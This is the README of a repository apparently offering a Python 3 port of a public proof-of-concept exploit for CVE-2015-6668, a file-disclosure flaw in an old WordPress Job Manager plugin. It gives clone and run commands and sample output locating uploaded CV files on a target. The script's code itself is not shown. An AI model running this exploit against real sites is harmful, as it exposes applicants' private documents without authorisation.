Evangelos Mourikis POC for CVE-2015-6668 converted for Python 3# CVE-2015-6668
Evangelos Mourikis POC for CVE-2015-6668 converted for Python 3
Exploits IDOR vulnerability in `Job Manager` plugin for Wordpress.
Tested on `Python 3.11.9`
## References
[NIST CVE](https://nvd.nist.gov/vuln/detail/CVE-2015-6668)
[WPScan Vuln DB](https://wpscan.com/vulnerability/9fd14f37-8c45-46f9-bcb6-8613d754dd1c/)
## Setup and Usage
Clone the repo, setup virtual environment (if desired), install `requests`, and run the script with Python 3.
### Clone
```bash
git clone https://github.com/jimdiroffii/CVE-2015-6668.git
cd CVE-2015-6668
```
### Python Virtual Environment (optional)
```bash
python3 -m venv .venv
```
- Bash
```bash
source .venv/bin/activate
```
- Powershell
```powershell
.\.venv\Scripts\activate
```
### Install `requests`
```bash
python3 -m pip install requests
```
### Run `exploit.py`
```bash
python3 ./exploit.py
```
## Output
```bash
$ python3 ./exploit.py
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
```
[4.0K] /data/pocs/c5efc0926be50610c14be651275e92510bb054de
├── [ 672] exploit.py
├── [1.0K] LICENSE
└── [1.3K] README.md
0 directories, 3 files